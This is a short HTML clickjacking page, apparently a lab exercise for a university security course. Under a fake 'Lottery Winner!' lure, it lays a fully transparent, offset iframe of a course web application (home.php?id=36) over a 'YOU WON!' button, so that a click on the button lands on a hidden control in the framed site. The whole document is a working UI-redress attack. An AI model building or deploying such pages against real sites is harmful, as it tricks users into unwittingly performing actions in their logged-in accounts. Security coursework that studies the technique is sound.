<!DOCTYPE html>
<html>
<head>
    <title>Lottery Winner!</title>
    <style>
        iframe {
            width: 1000px;
            height: 1000px;
            position: absolute;
            top: -170px;
            left: -850px;
            opacity: 0;
            z-index: 1;
            overflow:hidden;
        }
    </style>
</head>
    <body>
        <h1>CONGRATS!!</h1>

        <div>
	        <iframe src="http://csec380-core.csec.rit.edu:84/home.php?id=36"></iframe>
	        <button> YOU WON! </button>
        </div>

    </body>
</html>